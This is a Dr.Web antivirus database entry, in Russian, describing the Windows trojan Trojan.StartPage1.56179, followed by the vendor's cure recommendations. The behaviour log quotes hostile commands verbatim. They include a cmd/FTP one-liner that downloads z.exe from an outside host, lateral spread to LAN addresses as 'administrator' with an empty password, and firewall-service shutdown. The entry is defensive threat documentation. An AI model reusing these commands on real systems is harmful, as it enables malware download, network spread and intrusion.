Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.StartPage1.56179

Добавлен в вирусную базу Dr.Web: 2018-12-25

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Создает или изменяет следующие файлы:
  • %WINDIR%\Tasks\EXCn.vbe
  • %WINDIR%\Tasks\EXC3.exe
Создает следующие сервисы:
  • [<HKLM>\SYSTEM\ControlSet001\Services\Browser] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\lanmanserver] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\lanmanworkstation] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\LmHosts] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\RpcLocator] 'Start' = '00000002'
  • [<HKLM>\SYSTEM\ControlSet001\Services\NtLmSsp] 'Start' = '00000002'
Вредоносные функции:
Запускает на исполнение:
  • '<SYSTEM32>\taskkill.exe' /im coiome.exe /f
  • '<SYSTEM32>\taskkill.exe' /im iejore.exe /f
  • '<SYSTEM32>\taskkill.exe' /im conime.exe /f
Изменения в файловой системе:
Создает следующие файлы:
  • %ProgramFiles%\OJG.hta
  • %CommonProgramFiles%\sfbsbvy\coiome.exe
  • %HOMEPATH%\Local Settings\<INETFILES>\Content.IE5\KHMHGZ4F\b[1].jpg
  • %WINDIR%\Fonts\op.ini
  • %HOMEPATH%\Desktop\2345НшЦ·µјєЅ.url
  • \Device\LanmanRedirector\10.0.0.1\pipe\browser
  • \Device\LanmanRedirector\10.0.0.2\pipe\browser
  • \Device\LanmanRedirector\10.0.0.3\pipe\browser
  • \Device\LanmanRedirector\10.0.0.4\pipe\browser
  • \Device\LanmanRedirector\10.0.0.5\pipe\browser
Удаляет следующие файлы:
  • %ProgramFiles%\OJG.hta
  • <Полный путь к файлу>
Сетевая активность:
Подключается к:
  • 'localhost':1038
  • '<LOCALNET>.0.6':135
  • '<LOCALNET>.0.5':139
  • '<LOCALNET>.0.6':445
  • '<LOCALNET>.0.5':135
  • '<LOCALNET>.0.5':445
  • '<LOCALNET>.0.4':135
  • '<LOCALNET>.0.4':445
  • '<LOCALNET>.0.6':139
  • '<LOCALNET>.0.3':135
  • '<LOCALNET_GATEWAY>':139
  • '<LOCALNET>.0.2':135
  • '<LOCALNET>.0.2':445
  • '<LOCALNET_GATEWAY>':135
  • '<LOCALNET_GATEWAY>':445
  • 'tj.##16800.com':80
  • 's.###6800.com':80
  • '<LOCALNET>.0.3':445
  • '<LOCALNET>.0.7':445
TCP:
Запросы HTTP GET:
  • http://s.###6800.com/b.jpg
  • http://tj.##16800.com/t/Count.asp?ma################################
UDP:
  • DNS ASK s.###6800.com
  • DNS ASK tj.##16800.com
Другое:
Ищет следующие окна:
  • ClassName: '' WindowName: ''
Создает и запускает на исполнение:
  • '%CommonProgramFiles%\sfbsbvy\coiome.exe'
  • '%WINDIR%\Tasks\EXC3.exe' 10.0.0.1 :
  • '%WINDIR%\Tasks\EXC3.exe' 10.0.0.2 :
  • '%WINDIR%\Tasks\EXC3.exe' 10.0.0.3 :
  • '%WINDIR%\Tasks\EXC3.exe' 10.0.0.4 :
  • '%WINDIR%\Tasks\EXC3.exe' 10.0.0.5 :
  • '%WINDIR%\Tasks\EXC3.exe' 10.0.0.6 :
  • '<SYSTEM32>\cscript.exe' %WINDIR%\Tasks\EXCn.vbe 10.0.0.1 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>>b.dat&@ftp -s:b.dat&del b...
Запускает на исполнение:
  • '<SYSTEM32>\mshta.exe' "%ProgramFiles%\OJG.hta"
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\EXCn.vbe 10.0.0.5 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c sc delete LYTC
  • '<SYSTEM32>\sc.exe' delete JavaServe
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\EXCn.vbe 10.0.0.4 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c sc delete Messenger
  • '<SYSTEM32>\cmd.exe' /c sc stop Messenger
  • '<SYSTEM32>\locator.exe'
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\EXCn.vbe 10.0.0.3 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c sc stop LYTC
  • '<SYSTEM32>\net1.exe' start NtLmSsp
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\EXCn.vbe 10.0.0.2 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\net1.exe' start RpcLocator
  • '<SYSTEM32>\cmd.exe' /c taskkill /im conime.exe /f
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\EXCn.vbe 10.0.0.1 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...
  • '<SYSTEM32>\cmd.exe' /c taskkill /im iejore.exe /f
  • '<SYSTEM32>\net1.exe' start LmHosts
  • '<SYSTEM32>\cmd.exe' /c sc delete JavaServe
  • '<SYSTEM32>\net1.exe' stop sharedaccess
  • '<SYSTEM32>\net1.exe' start Browser
  • '<SYSTEM32>\net1.exe' start lanmanworkstation
  • '<SYSTEM32>\net1.exe' start lanmanserver
  • '<SYSTEM32>\sc.exe' config NtLmSsp start= auto
  • '<SYSTEM32>\sc.exe' config RpcLocator start= auto
  • '<SYSTEM32>\sc.exe' config LmHosts start= auto
  • '<SYSTEM32>\sc.exe' config lanmanworkstation start= auto
  • '<SYSTEM32>\sc.exe' config lanmanserver start= auto
  • '<SYSTEM32>\sc.exe' config Browser start= auto
  • '<SYSTEM32>\cmd.exe' /c del <Полный путь к файлу>
  • '<SYSTEM32>\cmd.exe' /c taskkill /im coiome.exe /f
  • '<SYSTEM32>\sc.exe' stop LYTC
  • '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cscript.exe %WINDIR%\Tasks\EXCn.vbe 10.0.0.6 administrator "" "cmd /c @echo open az0.8866.org>b.dat&@echo a>>b.dat&@echo a>>b.dat&@echo bin>>b.dat&@echo get z.exe>>b.dat&@echo by>...

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке